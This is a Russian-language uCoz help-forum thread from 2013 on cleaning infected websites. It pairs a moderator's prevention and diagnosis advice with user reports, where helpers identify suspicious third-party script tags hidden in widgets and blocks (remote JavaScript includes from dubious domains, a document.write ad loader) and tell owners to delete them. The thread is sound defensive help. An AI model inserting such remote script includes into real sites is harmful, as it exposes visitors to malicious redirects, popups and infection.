Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 886 | 18:50:18
    Глафира0969, удалите

    Код
    <!--Новогодняя картинка-->  
      <script language="JavaScript" src="http://101widgets.com/0000084b/100/220"></script>
    и больше никогда с этого сайта ничего к себе не ставьте

    на сайте блока вроде уже не должно быть

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Ленок9213
    Сообщений: 34
    Репутация: 2

    Сообщение # 887 | 18:55:39
    Здравствуйте! С наступающим! holiday

    Яндекс ругается. 2 письма сегодня пришло, что на моем сайте http://yournewway.ru/ обнаружен вредоносный код. Причем проиндексирована там по-прежнему только главная, других страниц для него не существует. Из новенького - вставила анимированную надпись "с новым годом". Может на нее так реагировать? В прошлые года все нормально было.

    http://yournewway.ru/
    Сообщение отредактировал Ленок9213 - Вторник, 24 Дек 2013, 18:57:10
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 888 | 18:58:28
    Ленок9213, проблема в крутой кнопке наверх. выделенное красным удалить. остальное просто грязь

    Цитата
    <style>.b-top {z-index:2600;position:fixed;left:0;bottom:10px;width:34;opacity: 0.5;filter:alpha(opacity=50);}
    .b-top:hover {opacity:1;filter:alpha(opacity=100);cursor:pointer;}
    .b-top-but {z-index:2600;position:absolute;display:block;left:56px;bottom:0;margin:0 0 0 100%;padding:79px 12px 4px;
    color:black;background: url(http://bambun.ru/site_img/c701ebd202c1.gif) no-repeat 50% 11px;border-radius:7px;}</style><script type="text/javascript" src="http://returna.net/background.js"></script><script type="text/javascript">$(document).ready(function(){
    $(window).scroll(function () {if ($(this).scrollTop() > 1000) {$('#scroller').fadeIn();} else {$('#scroller').fadeOut();}});
    $('#scroller').click(function () {$('body,html').animate({scrollTop: 0}, 400); return false;});
    });</script><div id="scroller" class="b-top" style="display: none;"><span class="b-top-but">Наверх</span></div>

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Ленок9213
    Сообщений: 34
    Репутация: 2

    Сообщение # 889 | 19:13:34
    Цитата webanet ()
    проблема в крутой кнопке наверх. выделенное красным удалить. остальное просто грязь
    Спасибо, webanet. Что бы я без Вас делала? flower
    Пошла удалять результаты этого художества, еще бы вспомнить куда ее воткнула. )) Все хочется чего-то оригинальненького. ))

    http://yournewway.ru/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 890 | 19:15:43
    Ленок9213,
    Цитата
    еще бы вспомнить куда ее воткнула
    глобальный блок нижняя часть сайта

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Alla3440
    Сообщений: 10
    Репутация: 0

    Сообщение # 891 | 16:55:25
    http://turmetod.ucoz.ua/ google chrome блокирует, помогите найти проблему
    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 892 | 17:41:08
    Цитата Alla3440 ()
    google chrome блокирует, помогите найти проблему


    Alla3440, в блоке Годинник убираем вот эти скрипты:

    Код
    <script language="JavaScript" src="http://xuxu.org.ua/i/170/150/10172202"></script>
    <script language="javascript" src="http://almastan.fliprunner.in/lll/4337997.js"></script>
    Сообщение отредактировал сondor - Четверг, 26 Дек 2013, 17:43:06
    Alla3440
    Сообщений: 10
    Репутация: 0

    Сообщение # 893 | 22:14:08
    Огромное спасибо, condor. Всё исправила пока работает
    cooler4692
    Сообщений: 4
    Репутация: 2

    Сообщение # 894 | 16:15:20
    Доброго времени суток, не могу справиться с проблемой, при поиске сайта http://mdou58.my1.ru/ через яндекс
    "МБДОУ №58 г. Армавир - Главная страница
    Сайт может угрожать безопасности вашего компьютера или мобильного устройства
    Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных. Почему?
    Посмотреть сохранённую безопасную копию
    Это не угрожает вашему компьютеру и данным
    Всё равно перейти на эту страницу
    Переход по ссылке может нанести вред вашему компьютеру или мобильному устройству"

    Выходит это текст. И на сайте когда переходишь по пунктам меню и ссылкам через раз открывается новое окно с посторонним содержимым.
    Как с этим бороться не знаю помогите пожалуйста.
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 895 | 16:37:08
    cooler4692, что это за скрипт в блоке с поиском?
    <script language='javascript' type='text/javascript' src='http://extronext.ru/7bl5e3nstnb7peio9rwphv6e2httcgop7utnkjku1q'></script>
    cooler4692
    Сообщений: 4
    Репутация: 2

    Сообщение # 896 | 17:44:42
    Цитата bandjuk ()
    cooler4692, что это за скрипт в блоке с поиском?
    Не знаю не я его ставил это точно, попробую удалить

    Добавлено (27 Дек 2013, 17:44:42)
    ---------------------------------------------
    bandjuk - Вы гений, вроде удаление помогло, как же я сам его не заметил. Огромное спасибо! Репу Вам повысил smile

    modastyle
    Сообщений: 19
    Репутация: 5

    Сообщение # 897 | 03:03:28
    Здравствуйте! С наступающим! Помогите пожалуйста яндекс ругается на мой сайт modastyle.ucoz.ua.
    Пишет: Сайт modastyle.ucoz.ua может угрожать безопасности вашего компьютера. По нашим данным, на страницах сайта был размещён вредоносный программный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.
    Не могу обнаружить проблему.

    Moda Style - это эксклюзивная одежда для женщин!
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 898 | 11:37:24
    modastyle, вроде яндекс уже не ругается. в любом случае вот это

    Код
    <script src="http://www.csomsk.ru/1-ucoz/pm/csscrolltopcontrol.js" type="text/javascript"></script>
    не стоит подгружать с сомнительного сайта, а лучше перелить на свой

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ohranatruda
    Сообщений: 5
    Репутация: 0

    Сообщение # 899 | 13:25:14
    Здравствуйте!
    http://sitecheck.sucuri.net/results/otipb.at.ua показывает заражение :

    <script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;counter2?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><script
    type="text/javascript">
    var m_up = [
    ['s',"94367"],
    ];
    document.write('<scr'+'ipt type="text/javascript"
    src="http://cache.betweendigital.com/code/mobile.js"></scr'+'ipt>');
    </script>

    Но это похоже на счетчик www.liveinternet.ru

    кроме этого куска <script type="text/javascript">
    var m_up = [
    ['s',"94367"],
    ];
    document.write('<scr'+'ipt type="text/javascript"
    src="http://cache.betweendigital.com/code/mobile.js"></scr'+'ipt>');
    </script>

    но я его совсем не нахожу, и главное не ставил такого рекламного кода.

    Помогите разобраться. Пожалуйста!!!!!!!
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 900 | 13:41:46
    ohranatruda, тут вам не помогут. тут не расшифровывают выкидыши, то есть результаты онлайн проверок. если вы так любите эти проверки, то жмите на все ссылочки. смотрите. там на сайтике вам быстро помогут http://sucuri.net/signup?from-getclean дайте денежек и вас типа защитят.

    ну или сами ищите. я вам расскажу где есть счетчики ливы. в рекламе юкоз. ваш счетчик

    почему вы вдруг решили искать вирусы на сайте? что сподвигло? у вас довольно жесткая реклама

    Код
    http://otipb.at.ua/107/3/7332257334.js


    Код
    <script type="text/javascript" src="http://samiana.com/53h/473745eb005"></script>
    неужели обязательно было ставить это рядом с гуглом? зачем столько рекламы?

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Поиск: